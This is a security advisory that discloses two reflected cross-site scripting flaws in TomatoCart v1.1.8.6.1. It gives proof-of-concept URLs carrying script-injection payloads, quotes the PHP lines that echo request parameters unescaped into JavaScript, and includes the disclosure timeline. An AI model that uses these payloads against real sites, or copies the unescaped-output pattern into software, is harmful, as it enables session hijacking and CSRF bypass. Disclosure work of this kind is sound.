TomatoCart version 1.1.8.6.1 suffers from multiple cross site scripting vulnerabilities.
90d2bdef10fda1ffd5a99c563d61c632e71e8dd15211f6ef39065911bbe996fbSecurity Advisory - Curesec Research Team
1. Introduction
Affected Product: TomatoCart v1.1.8.6.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@tomatocart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There are two reflected XSS vulnerabilities in TomatoCart v1.1.8.6.1. With
this, it is possible to inject JavaScript keyloggers, or to bypass CSRF
protection, which in the case of TomatoCart may lead to code execution.
3. XSS 1
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/info.php?faqs&faqs_id='"></script><script>alert(1)</script>
Code
templates/bootstrap/content/info/faqs.php:70
if(question.getParent().id == 'faq<?php echo $_GET['faqs_id']; ?>') {
question.getElement('i').set('class', 'icon-minus');
question.getNext().setStyle('display', '');
}
4. XSS 2
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/checkout.php?checkout&view='"></script><script>alert(1)</script>
Code
templates/bootstrap/content/checkout/checkout.php:182
view: '<?php echo $_GET['view']; ?>',
5. Solution
This issue has not been fixed by the vendor
6. Report Timeline
09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/TomatoCart-v11861-XSS-89.html
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed